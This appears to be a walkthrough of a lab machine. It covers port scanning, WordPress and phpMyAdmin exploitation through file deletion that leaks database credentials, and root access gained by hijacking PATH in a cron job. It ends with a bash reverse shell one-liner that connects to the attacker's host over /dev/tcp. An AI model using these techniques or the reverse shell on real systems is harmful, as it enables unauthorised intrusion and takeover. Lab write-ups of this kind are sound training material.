$ nmap -p- --min-rate 4000 192.168.197.174
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 21:06 +08
Nmap scan report for 192.168.197.174
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8888/tcp open sun-answerbook
Just 2 ports on the website.
Web Enumeration -> WP Creds
Port 80 shows a Wordpress site:
Port 8888 on the other hand shows a phpMyAdmin instance:
When we view the page source of port 8888, there is indication of the version running:
This version is vulnerable to an RCE exploit that requires credentials, which we'll keep in mind for now:
Default credentials don't work with this site. Since there was a Wordpress site available, we can use wpscan for some basic enumeration. There was loads of output, but I found this one vulnerability to be the most interesting for now.
With these credentials, we can login to the dashboard and begin checking out the other vulnerabilities:
Arbitrary File Deletion -> RCE
wpscan revealed many different types of exploits, including an authenticated RCE. However, since we aren't the administrator of Wordpress, it's unlikely that we can directly get RCE through WP. So, I turned my attention towards exploiting phpMyAdmin.
Out of all the exploits that are available, it seemed that the Arbitrary File Delete works:
When run on the localhost, it causes the Wordpress instance to start crashing since wp-config.php no longer exists and the website cannot do anything without it. Searching more about this file deletion led me to this blog:
To exploit this, we can use the instructions given in the JS file. This involves using the Developer Console and pasting some code within it. Afterwards, we can just execute the function as required:
Once deleted, this kind of breaks the entire website. It just returns source code:
Using this, we can view the wp-config.php file since the website is no longer executing PHP:
$ curl http://192.168.197.174/wp-config.php <?php/** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define('DB_NAME','wordpress');/** MySQL database username */define('DB_USER','wordpress');/** MySQL database password */define('DB_PASSWORD','ThinnerATheWaistline348');/** MySQL hostname */define('DB_HOST','localhost');/** Database Charset to use in creating database tables. */define('DB_CHARSET','utf8');/** The Database Collate type. Don't change this if in doubt. */define('DB_COLLATE','');<TRUNCATED>
Using this password, we can achieve RCE on phpMyAdmin:
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1042 Oct 11 2019 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Oct 25 2021 .
drwxr-xr-x 77 root root 4096 Dec 13 2021 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rw-r--r-- 1 root root 712 Dec 17 2018 php
-rw-r--r-- 1 root root 348 Oct 25 2021 wpclean
There's a wpclean thing running periodically on the machine. Here's the contents of that script:
# /etc/cron.d/wpclean: crontab entries to cleanup wordpress uploads folderHOME=/var/www/html/wordpress/wp-content/uploadsPATH=~/bin:/usr/bin:/bin# in case the intern do something silly, delete all files with invalid image extension*/5 **** root /usr/bin/find . -type f -not -regex '.*\.\(jpg\|jpeg\|png\|gif\)' -exec bash -c "rm -f {}" \;
First thing I noticed was that this was using a custom HOME variable, which is included in the PATH variable as the first directory and the fact that www-data can write to their HOME directory. The rm binary they execute here does not have the full path, so we can create our own rm file that gives a reverse shell when executed.
Here's the contents of my reverse shell:
/bin/bash-c'/bin/bash -i >& /dev/tcp/192.168.45.177/4444 0>&1'## need to specify full paths!
